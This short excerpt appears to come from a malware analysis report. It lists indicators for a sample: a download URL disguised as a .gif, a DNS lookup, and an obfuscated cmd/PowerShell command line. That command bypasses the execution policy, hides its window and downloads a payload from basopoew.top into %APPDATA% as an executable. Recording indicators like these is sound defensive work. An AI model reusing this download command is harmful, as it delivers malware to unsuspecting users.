Technical Information
- http://www.basopoew.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWERsHELL.ExE -exeCutIOnPOLicy byPASS -nOprOFilE -WINdowStyLE hiDdEn (new-obJecT SYStEM.NEt.wEBcliEnT).DowNlOaDfIle('http://www.basopoew.top/read.php?f=1.gif','%APPData%....
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "pOWERsHELL.ExE -exeCutIOnPOLicy byPASS -nOprOFilE -WINdowStyLE hiDdEn (new-obJecT SYStEM.NEt.wEBcliEnT).DowNlOaDfIle('http://www.basopoew.top/read.php?f=1.gif','%APPData%....' (with hidden window)